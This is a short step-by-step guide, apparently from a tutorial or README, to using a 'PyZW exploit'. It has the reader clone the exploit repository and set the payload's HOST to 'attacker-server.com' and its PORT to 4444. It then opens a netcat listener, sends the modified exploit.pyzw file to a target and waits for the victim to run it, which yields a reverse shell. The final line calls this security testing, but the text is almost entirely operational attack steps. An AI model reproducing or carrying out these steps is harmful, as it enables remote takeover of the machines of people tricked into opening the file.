First, clone the PyZW Exploit code from GitHub using the following command:
git clone https://github.com/hackintoanetwork/pyzw-exploit
Replace the server address and port address in the exploit.pyzw file with attacker server address.
HOST = "attacker-server.com" # change here
PORT = 4444 # change here
The Attacker needs to prepare a reverse shell on their server. Use the following command to open the reverse shell:
nc -lvnp 4444
Send the modified exploit.pyzw file to the target system. Wait for the target to execute the file.
When the target executes the exploit.pyzw file, it will automatically connect to the reverse shell on your configured server. This provides the researcher with access to the target system for security testing.